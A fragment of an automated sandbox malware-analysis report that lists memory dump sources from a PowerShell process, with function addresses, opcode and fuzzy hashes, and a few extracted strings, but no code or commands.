                                                                                              • Source File: 00000003.00000002.1319172365.00007FFAAC640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC640000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_7ffaac640000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5690bc6ea5de5b619006f735620f1603f2d68515b23aea6507f1cf2a2baeedff
                                                                                              • Instruction ID: 736b450a9449b031c22d4fc55b2b4a7ccf24d5acf856c72e4105c406c1d464d3
                                                                                              • Opcode Fuzzy Hash: 5690bc6ea5de5b619006f735620f1603f2d68515b23aea6507f1cf2a2baeedff
                                                                                              • Instruction Fuzzy Hash: DAD1126291EBCA8FF797DB6C89555BA7FD1EF42210B1860BAD04DC7093ED18D8098391
                                                                                              Function 00007FFAAC5733B5 Relevance: .0, Instructions: 49COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1318826594.00007FFAAC570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC570000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_7ffaac570000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                                              • Instruction ID: bee303c1f4efc301387659d61f640e7d41f0dbd1056ec0066b2a57676e6cd883
                                                                                              • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                                              • Instruction Fuzzy Hash: 9001677115CB0D8FD744EF0CE451AA5B7E0FB99364F10056DE58AC36A1DA36E882CB45

                                                                                              Non-executed Functions

                                                                                              Function 00007FFAAC572066 Relevance: 5.4, Strings: 4, Instructions: 432COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1318826594.00007FFAAC570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC570000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_7ffaac570000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: X]I$!P_^$@rJ$HI*
                                                                                              • API String ID: 0-953585876
                                                                                              • Opcode ID: b1c9abf69c2b9cfa5110cc378570c0f4f78c3017cf9c60471f604897547c4d2f
                                                                                              • Instruction ID: 7fcefa170b2ffa9825f5f0b6ea25ddb3be6aff875046ddf0bdcb885aa2c3eecf
                                                                                              • Opcode Fuzzy Hash: b1c9abf69c2b9cfa5110cc378570c0f4f78c3017cf9c60471f604897547c4d2f
                                                                                              • Instruction Fuzzy Hash: BED1A7A794E7E3DFF3125B685DA50E53F64EF5322470984F7E0C88A497E814988E83E1